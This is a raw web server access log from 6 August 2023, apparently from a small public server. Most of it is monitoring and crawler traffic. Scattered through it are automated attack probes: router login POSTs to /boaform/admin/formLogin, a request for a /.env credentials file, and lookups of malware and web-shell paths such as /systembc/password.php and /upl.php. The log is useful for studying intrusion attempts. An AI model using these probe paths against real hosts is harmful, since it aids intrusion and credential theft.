212.91.246.72 - - [06/Aug/2023:20:15:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.235 - - [06/Aug/2023:20:16:21 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [06/Aug/2023:20:16:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:17:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:18:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:19:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:20:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
134.209.195.145 - - [06/Aug/2023:20:21:43 +0200] "\x16\x03\x01" 501 318 "-" "-"
134.209.195.145 - - [06/Aug/2023:20:21:43 +0200] "\x16\x03\x01" 501 318 "-" "-"
134.209.195.145 - - [06/Aug/2023:20:21:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
134.209.195.145 - - [06/Aug/2023:20:21:44 +0200] "GET /client/get_targets HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
134.209.195.145 - - [06/Aug/2023:20:21:44 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
134.209.195.145 - - [06/Aug/2023:20:21:44 +0200] "\x16\x03\x01" 501 318 "-" "-"
134.209.195.145 - - [06/Aug/2023:20:21:44 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
134.209.195.145 - - [06/Aug/2023:20:21:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Snapchat/10.77.0.54 (like Safari/604.1)"
134.209.195.145 - - [06/Aug/2023:20:21:44 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
134.209.195.145 - - [06/Aug/2023:20:21:44 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
134.209.195.145 - - [06/Aug/2023:20:21:44 +0200] "GET /bundle.js HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
134.209.195.145 - - [06/Aug/2023:20:21:44 +0200] "GET /files/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
134.209.195.145 - - [06/Aug/2023:20:21:44 +0200] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
212.91.246.72 - - [06/Aug/2023:20:21:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:22:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:23:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:24:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:25:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:26:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:27:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.42.95.168 - - [06/Aug/2023:20:28:18 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [06/Aug/2023:20:28:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.88.90.144 - - [06/Aug/2023:20:29:12 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
205.210.31.109 - - [06/Aug/2023:20:29:13 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [06/Aug/2023:20:29:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:30:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:31:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:32:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:33:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:34:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:35:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:36:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:37:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:38:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:39:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:40:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:41:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:42:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:43:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:44:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:45:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:46:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:47:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:48:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:49:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:50:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:51:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:52:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:53:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:54:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:55:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:56:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:57:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:58:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:20:59:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:00:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
54.36.149.81 - - [06/Aug/2023:21:01:50 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
212.91.246.72 - - [06/Aug/2023:21:01:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:02:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:03:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.42.87.165 - - [06/Aug/2023:21:04:25 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.88.90.145 - - [06/Aug/2023:21:04:44 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [06/Aug/2023:21:04:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:05:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.159.214.48 - - [06/Aug/2023:21:06:01 +0200] "HEAD / HTTP/1.1" 200 - "-" "curl/7.81.0"
51.159.214.48 - - [06/Aug/2023:21:06:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
212.91.246.72 - - [06/Aug/2023:21:06:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:07:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:08:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:09:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:10:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.225.75 - - [06/Aug/2023:21:11:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.225.75 - - [06/Aug/2023:21:11:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.225.75 - - [06/Aug/2023:21:11:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.225.75 - - [06/Aug/2023:21:11:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.225.75 - - [06/Aug/2023:21:11:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.225.75 - - [06/Aug/2023:21:11:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.225.75 - - [06/Aug/2023:21:11:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.225.75 - - [06/Aug/2023:21:11:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [06/Aug/2023:21:11:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.225.75 - - [06/Aug/2023:21:11:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.225.75 - - [06/Aug/2023:21:11:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [06/Aug/2023:21:12:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:13:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:14:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:15:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:16:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:17:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:18:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:19:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:20:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.42.87.157 - - [06/Aug/2023:21:21:37 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [06/Aug/2023:21:21:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:22:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:23:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:24:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.88.90.145 - - [06/Aug/2023:21:25:32 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [06/Aug/2023:21:25:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:26:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
37.139.129.139 - - [06/Aug/2023:21:27:51 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
37.139.129.139 - - [06/Aug/2023:21:27:51 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
212.91.246.72 - - [06/Aug/2023:21:27:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:28:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.88.90.145 - - [06/Aug/2023:21:29:08 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [06/Aug/2023:21:29:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:30:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:31:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:32:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.88.90.144 - - [06/Aug/2023:21:32:59 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [06/Aug/2023:21:33:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:34:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:35:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:36:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:37:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:38:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
137.184.217.189 - - [06/Aug/2023:21:39:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0"
212.91.246.72 - - [06/Aug/2023:21:39:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:40:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:41:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:42:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:43:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:44:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.88.90.145 - - [06/Aug/2023:21:45:37 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [06/Aug/2023:21:45:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:46:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:47:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:48:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.66.88.204 - - [06/Aug/2023:21:49:36 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [06/Aug/2023:21:49:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:50:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:51:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:52:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:53:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.97.210.59 - - [06/Aug/2023:21:54:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [06/Aug/2023:21:54:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:55:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.203.37 - - [06/Aug/2023:21:56:05 +0200] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
192.241.203.37 - - [06/Aug/2023:21:56:25 +0200] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
192.241.203.37 - - [06/Aug/2023:21:56:33 +0200] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
192.241.203.37 - - [06/Aug/2023:21:56:35 +0200] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
192.241.203.37 - - [06/Aug/2023:21:56:38 +0200] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
192.241.203.37 - - [06/Aug/2023:21:56:41 +0200] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
192.241.203.37 - - [06/Aug/2023:21:56:51 +0200] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [06/Aug/2023:21:56:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.203.37 - - [06/Aug/2023:21:57:03 +0200] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
192.241.203.37 - - [06/Aug/2023:21:57:15 +0200] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
192.241.203.37 - - [06/Aug/2023:21:57:41 +0200] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [06/Aug/2023:21:57:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Aug/2023:21:58:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
